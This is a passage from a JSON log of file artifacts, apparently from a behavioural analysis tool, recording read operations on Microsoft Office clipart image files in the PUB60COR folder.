Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234376.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234376.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237225.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237228.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237336.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237759.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238333.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239611.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240175.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250504.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250997.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0251007.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0279644.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0280468.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281008.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281243.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282928.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285780.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285782.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287018.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287019.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287020.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287024.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287408.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287415.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287417.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287641.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287642.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287644.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287645.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0290548.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292270.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292286.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294991.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296277.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296279.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296288.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297229.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297725.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297757.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297759.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0300862.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301418.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301432.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304853.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304875.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304875.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309567.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309585.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309598.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309664.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309705.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313896.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313965.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313970.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313974.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0314068.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315580.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315612.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0318448.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341439.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341447.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341448.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341455.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341475.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341551.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341554.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341557.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341559.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341561.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341738.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341742.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382836.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382925.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382926.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382927.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382930.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382931.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382938.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382939.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382942.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382944.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382947.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382948.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382950.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382952.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382954.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382955.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382957.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382958.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382959.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382960.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382961.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382962.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382963.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382965.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382966.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382967.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382968.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382969.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382970.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384862.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384885.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384888.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384895.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384900.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386120.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386267.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386764.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387337.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387578.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387591.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387604.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387882.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387895.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400001.png", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400002.png", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400003.png", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG", 